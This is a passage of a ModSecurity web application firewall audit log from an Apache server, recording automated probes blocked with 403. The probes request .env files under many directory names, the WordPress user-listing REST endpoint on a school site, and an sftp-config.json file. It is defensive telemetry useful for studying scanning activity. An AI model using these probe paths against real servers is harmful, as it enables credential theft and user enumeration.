X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --a422ec1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a422ec1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738117955571 717 (- - -) Stopwatch2: 1748738117955571 717; combined=310, p1=276, p2=0, p3=0, p4=0, p5=34, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a422ec1d-Z-- --90f0e81a-A-- [01/Jun/2025:07:35:18 +0700] aDugRkaTRmdfB-FaJjm5gwAAABA 103.236.140.4 59578 103.236.140.4 8181 --90f0e81a-B-- GET /laravel/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --90f0e81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f0e81a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738118316786 703 (- - -) Stopwatch2: 1748738118316786 703; combined=273, p1=242, p2=0, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f0e81a-Z-- --d01f202f-A-- [01/Jun/2025:07:35:18 +0700] aDugRkaTRmdfB-FaJjm5hAAAABM 103.236.140.4 59580 103.236.140.4 8181 --d01f202f-B-- GET /services/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --d01f202f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d01f202f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738118686819 675 (- - -) Stopwatch2: 1748738118686819 675; combined=250, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d01f202f-Z-- --c1c91535-A-- [01/Jun/2025:07:35:19 +0700] aDugRwQ4kZQGAOBHoB5CqAAAAM4 103.236.140.4 59582 103.236.140.4 8181 --c1c91535-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --c1c91535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c91535-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738119050947 664 (- - -) Stopwatch2: 1748738119050947 664; combined=257, p1=224, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1c91535-Z-- --de8f564f-A-- [01/Jun/2025:07:35:19 +0700] aDugR0aTRmdfB-FaJjm5hQAAABQ 103.236.140.4 59584 103.236.140.4 8181 --de8f564f-B-- GET /service/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --de8f564f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8f564f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738119417761 749 (- - -) Stopwatch2: 1748738119417761 749; combined=334, p1=302, p2=0, p3=0, p4=0, p5=32, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8f564f-Z-- --088db51f-A-- [01/Jun/2025:07:35:19 +0700] aDugR0aTRmdfB-FaJjm5hgAAABI 103.236.140.4 59586 103.236.140.4 8181 --088db51f-B-- GET /test/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --088db51f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --088db51f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738119794726 716 (- - -) Stopwatch2: 1748738119794726 716; combined=304, p1=271, p2=0, p3=0, p4=0, p5=32, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --088db51f-Z-- --4e9e074c-A-- [01/Jun/2025:07:35:20 +0700] aDugSAQ4kZQGAOBHoB5CqQAAANI 103.236.140.4 59588 103.236.140.4 8181 --4e9e074c-B-- GET /demo/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --4e9e074c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e9e074c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738120145766 637 (- - -) Stopwatch2: 1748738120145766 637; combined=253, p1=220, p2=0, p3=0, p4=0, p5=32, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e9e074c-Z-- --fc957601-A-- [01/Jun/2025:07:35:20 +0700] aDugSAQ4kZQGAOBHoB5CqgAAANE 103.236.140.4 59592 103.236.140.4 8181 --fc957601-B-- GET /local/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --fc957601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc957601-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738120869468 670 (- - -) Stopwatch2: 1748738120869468 670; combined=293, p1=267, p2=0, p3=0, p4=0, p5=26, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc957601-Z-- --2a55123b-A-- [01/Jun/2025:07:35:21 +0700] aDugSUaTRmdfB-FaJjm5iAAAABY 103.236.140.4 59594 103.236.140.4 8181 --2a55123b-B-- GET /system/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --2a55123b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a55123b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738121223778 654 (- - -) Stopwatch2: 1748738121223778 654; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a55123b-Z-- --3d118223-A-- [01/Jun/2025:07:35:21 +0700] aDugSUaTRmdfB-FaJjm5iQAAABg 103.236.140.4 59596 103.236.140.4 8181 --3d118223-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --3d118223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d118223-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738121583696 669 (- - -) Stopwatch2: 1748738121583696 669; combined=293, p1=261, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d118223-Z-- --69cce12c-A-- [01/Jun/2025:07:35:21 +0700] aDugSe4LjVe0Eerk_ZaIAwAAAEU 103.236.140.4 59598 103.236.140.4 8181 --69cce12c-B-- GET /blog1/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --69cce12c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69cce12c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738121937909 859 (- - -) Stopwatch2: 1748738121937909 859; combined=349, p1=309, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69cce12c-Z-- --cf83b66f-A-- [01/Jun/2025:07:35:22 +0700] aDugSkaTRmdfB-FaJjm5igAAABc 103.236.140.4 59600 103.236.140.4 8181 --cf83b66f-B-- GET /site/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --cf83b66f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf83b66f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738122299116 687 (- - -) Stopwatch2: 1748738122299116 687; combined=326, p1=295, p2=0, p3=0, p4=0, p5=30, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf83b66f-Z-- --65c3196b-A-- [01/Jun/2025:07:41:20 +0700] aDuhsO4LjVe0Eerk_ZaIFAAAAEY 103.236.140.4 59676 103.236.140.4 8181 --65c3196b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.189.18.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --65c3196b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65c3196b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748738480629313 3648 (- - -) Stopwatch2: 1748738480629313 3648; combined=1527, p1=478, p2=1017, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65c3196b-Z-- --eb06af77-A-- [01/Jun/2025:07:41:34 +0700] aDuhvu4LjVe0Eerk_ZaIFQAAAEU 103.236.140.4 59678 103.236.140.4 8181 --eb06af77-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9930; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.267 Mobile Safari/534.11+ Accept-Charset: utf-8 --eb06af77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb06af77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738494399503 813 (- - -) Stopwatch2: 1748738494399503 813; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb06af77-Z-- --5b6b2c16-A-- [01/Jun/2025:07:43:18 +0700] aDuiJu4LjVe0Eerk_ZaIGAAAAEs 103.236.140.4 59692 103.236.140.4 8181 --5b6b2c16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.166.206.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.166.206.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5b6b2c16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b6b2c16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748738598551801 3522 (- - -) Stopwatch2: 1748738598551801 3522; combined=1545, p1=551, p2=955, p3=0, p4=0, p5=38, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b6b2c16-Z-- --956abf42-A-- [01/Jun/2025:07:56:21 +0700] aDulNQQHT18O7PnXxsQIdQAAAIE 103.236.140.4 59888 103.236.140.4 8181 --956abf42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.4(0x17000428) NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --956abf42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --956abf42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748739381833607 28235 (- - -) Stopwatch2: 1748739381833607 28235; combined=55182, p1=324, p2=0, p3=0, p4=0, p5=27448, sr=114, sw=1, l=0, gc=27409 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --956abf42-Z-- --83f58e18-A-- [01/Jun/2025:08:04:01 +0700] aDunAQQHT18O7PnXxsQIiwAAAIE 103.236.140.4 60076 103.236.140.4 8181 --83f58e18-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.196.179.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.196.179.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --83f58e18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83f58e18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748739841352379 3184 (- - -) Stopwatch2: 1748739841352379 3184; combined=1409, p1=483, p2=835, p3=0, p4=0, p5=91, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83f58e18-Z-- --acf51075-A-- [01/Jun/2025:08:27:22 +0700] aDusekaTRmdfB-FaJjm5xAAAAA4 103.236.140.4 60674 103.236.140.4 8181 --acf51075-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.120.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.120.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --acf51075-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf51075-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748741242056574 3396 (- - -) Stopwatch2: 1748741242056574 3396; combined=1518, p1=528, p2=954, p3=0, p4=0, p5=36, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf51075-Z-- --389c7d19-A-- [01/Jun/2025:08:44:03 +0700] aDuwYwQ4kZQGAOBHoB5DEAAAAMM 103.236.140.4 32810 103.236.140.4 8181 --389c7d19-B-- GET /sftp-config.json HTTP/1.0 